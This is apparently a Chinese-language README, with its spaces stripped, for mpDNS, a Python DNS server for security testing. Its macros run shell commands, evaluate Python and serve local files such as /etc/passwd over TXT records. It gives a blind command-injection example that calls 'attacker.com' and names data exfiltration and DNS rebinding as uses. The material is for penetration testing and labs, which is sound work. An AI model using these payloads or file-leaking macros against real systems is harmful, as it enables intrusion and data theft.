简单、可配置的“克隆并运行”DNS服务器,具有各种有用的功能。适用于Python2和3names.db->包含所有自定义记录(参见示例)简单的通配符,如*.example.com捕获unicodedns请求自定义操作也称为宏:-{{shellexec::diggoogle.com+short}}–>执行shell命令并返回结果-{{eval::res='1.1.1.%d'%random.randint(0,256)}}->评估你的python代码-{{file::/etc/passwd}}–>回复本地文件内容–{{resolve}}–>转发DNS请求到本地系统DNS–{{resolve::example.com}}–>解析example.com而不是原来的记录–{{echo}}–>回复对端地址-{{shellexec::echo%PEER%%QUERY%}}–>使用变量支持的查询类型:A、CNAME、TXT更新names.db记录,无需重启/重启加载./mpdns.py-e严重基于https://github.com/circuits/circuits/blob/master/examples/dnsserver.pyusage:./mpdns.pyeditnames.db,./mpdns.py-e不需要重启攻防目的:1.你需要一个轻量级简单的DNS服务器解决方案,用于测试目的(非production!)2.测试web应用程序中的各种盲注漏洞(例如/ping.php?ip=$(dig$(whoami).attacker.com))3.在一个TXT查询中轻松泄露65K数据4.DNS重新绑定5.对特定查询执行自定义宏操作(在恶意软件分析实验室环境中有用)6.还有很多。它是高度可定制的。安装gitclonehttps://github.com/nopernik/mpDNS限制1.由于UDP数据报被限制为65535字节,DNS响应被限制为大约65200字节。此限制适用于分为256字节块的TXT记录,直到响应达到最大允许值65200b,因此TXT宏记录{{file:localfile.txt}}被限制为65200字节。2.嵌套通配符测试。*.example.com不受支持3.{{resolve::example.com}}宏不支持自定义DNS服务器解析器4.TTL始终设置为0示例names.db示例:#Emptyconfigurationwillresultinemptybutvalidresponses##Unicode域名不受支持,但仍然可以被服务器捕获。#forexampleмама-сервер-unicode.google.com将被捕获,但有SERVFAIL响应1,500)}}resolve1A{{resolve}}resolve2A{{resolve::self}}#sameaspreviousresolve3A{{resolve::example.com}}blabla.comA5.5.5.5*A127.0.0.1*.example.comA7。7.7.7c1.example.comCNAMEc2.example.comc2.example.comCNAMEc3.example.comc3.example.comCNAMEgoogle.example.comgoogle.example.comCNAMEgoogle.comtest.example.comA8.8.8.8google.comA{{resolve::self}}notgoogle.comA{{resolve::google.com}}使用names.db示例的示例输出:DB的常规解决方案:digtest.example.com@localhost;;ANSWERSECTION:test.example.com.0INA8。8.8.8mpDNS输出:-Requestfrom127.0.0.1:57698->test.example.com.->8.8.8.8(A)发送归CNAME解析:digc1.example.com@localhost;;QUESTIONSECTION:;c1.example.com.INA;;ANSWERSECTION:c1.example.com.0INCNAMEc2.example.com.c2.example.com.0INCNAMEc3.example.com.c3.example.com.0INCNAMEgoogle.example.com.google.example.com.0INCNAMEgoogle.com.google.com.0INA216.58.206.14mpDNS输出:-Requestfrom127.0.0.1:44120->c1.example.com.->c2.example.com(CNAME)-Requestfrom127.0.0.1:44120->c2.example.com->c3.example.com(CNAME)-Requestfrom127。0.0.1:44120->c3.example.com->google.example.com(CNAME)-Requestfrom127.0.0.1:44120->google.example.com->google.com(CNAME)-Requestfrom127.0.0。1:44120->google.com->{{resolve::self}}(A)通配符解析:dignot-in-db.com@localhost;;ANSWERSECTION:not-in-db.com.0INA127.0.0.1mpDNS输入:-Requestfrom127.0.0.1:38528->not-in-db.com.->127.0.0.1(A)通配符域解析:digwildcard.example.com@localhost;;ANSWERSECTION:wildcard.example.com。0INA7.7.7.7mpDNS输出:-Requestfrom127.0.0.1:39691->wildcard.example.com.->7.7.7.7(A)转发请求宏:diggoogle.com@localhost;;ANSWERSECTION:google.com.0INA172.217.22.110mpDNS输出:-Requestfrom127.0.0.1:53487->google.com.->{{resolve::self}}(A)自定义域宏转发请求:dignotgoogle.com@localhost;;答案:notgoogle.com.0INA172.217.22.110mpDNS输出:-Requestfrom127.0.0.1:47797->notgoogle。com.->{{resolve::google.com}}(A)通过TXT查询文件内容宏:digtxtpasswd.example.com@localhost;;ANSWERSECTION:passwd.example.com.0INTXT"root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:...剥离“mpDNS输出:-Requestfrom127.0.0.1:38805->passwd.example.com.->['root:x:0:0:root...(2808)'](TXT)通过TXT查询自定义python代码宏:digxteval@本地主机;;答案:eval.0INTXT"320"mpDNS输出:-Requestfrom127.0.0.1:33821->eval.->['320'](TXT)通过TXT的Shell命令宏查询:digtxtshellexec@localhost;;答案:shellexec.0INTXT“root”mpDNS输出:-Requestfrom127.0.0.1:50262->shellexec.->['root'](TXT)
